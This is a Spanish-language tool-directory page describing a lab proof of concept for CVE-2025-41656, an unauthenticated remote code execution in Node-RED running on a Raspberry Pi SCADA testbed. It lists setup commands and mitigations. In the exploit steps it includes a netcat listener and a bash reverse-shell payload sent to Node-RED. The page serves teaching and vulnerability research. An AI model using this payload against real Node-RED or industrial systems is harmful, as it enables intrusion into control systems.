Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-41656 — Este repositorio incluye el código y los archivos necesarios para probar y ejecutar un PoC para CVE-2025-41656 | Kitploit
Herramientas/GitHubGitHub/wallyschag/cve-2025-41656
Seguridad IoTAnálisis de VulnerabilidadesExplotaciónSeguridad SCADA/ICSAprendizaje y EducaciónLabs y Práctica
GitHubwallyschag/cve-2025-41656

CVE-2025-41656

Este repositorio incluye el código y los archivos necesarios para probar y ejecutar un PoC para CVE-2025-41656

Ver Repositorio
24hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-41656

Resumen del Proyecto

Este proyecto existe para modelar CVE-2025-41656, una vulnerabilidad de ejecución remota de código no autenticada para NodeRED. Para modelar esta vulnerabilidad, creamos un sistema SCADA de factor de forma pequeño con una Raspberry Pi, un actuador y un sensor. La Raspberry Pi contiene un contenedor NodeRED y un contenedor OpenPLC que se comunican entre sí a través de Modbus TCP para controlar el actuador. Este es un script de prueba de concepto en Python para llevar a cabo el ataque CVE-2025-41656. El objetivo es crear con éxito un PoC y encontrar remediaciones para asegurar el sistema.

Cómo empezar

El laboratorio incluirá los siguientes componentes

  • Raspberry Pi 3b+
  • Archivo Docker Compose con los contenedores NodeRED y OpenPLC
  • Un actuador
  • Un sensor
  • Un dispositivo motorizado controlado por el actuador
  • Nota: La configuración será diferente dependiendo del hardware que tengas. Ajústala en consecuencia.

Instalación de Software

root@kitploit:~
git clone [email protected]:wallyschag/CVE-2025-41656.git
cd CVE-2025-41656
git clone https://github.com/thiagoralves/OpenPLC_v3.git

Configuración de Docker

root@kitploit:~
rm OpenPLC_v3/Dockerfile && cp Dockerfile_WiringPi OpenPLC_v3/Dockerfile
docker compose up --build -d
  • Verifica que los contenedores Docker y el puente de red estén arriba y funcionando
root@kitploit:~
docker container ls
docker network inspect csci587-final-project_scadanet
  • Ambos contenedores Docker deberían estar activos.
  • Asegúrate también de que ambos contenedores estén conectados a la red y tengan una dirección IP asignada.

El exploit

  • En la máquina anfitriona ejecuta nc -lvnp 1234
  • Cambia NODE_RED_IP y NODE_RED_PORT por la dirección IP y el puerto (1880) de tu servicio NodeRED en cve_2025_41656.py.
  • Dentro de cve_2025_41656, cambia la dirección IP en la línea "command": "bash -c 'bash -i >& /dev/tcp/192.168.4.223/1234 0>&1'", por la dirección IP de la máquina desde la que estás lanzando el exploit.
root@kitploit:~
python3 cve_2025_41656.py
  • Ahora deberías tener una shell reversa en el contenedor NodeRED.

Estrategias de Mitigación

  • Implementa TLS y un mecanismo de autenticación para NodeRED.
  • Segmenta las redes SCADA para evitar el acceso no autorizado a NodeRED.
  • Monitorea las redes que contengan NodeRED con sistemas IDS/IPS para buscar tráfico de shell reversa.
Descargar herramienta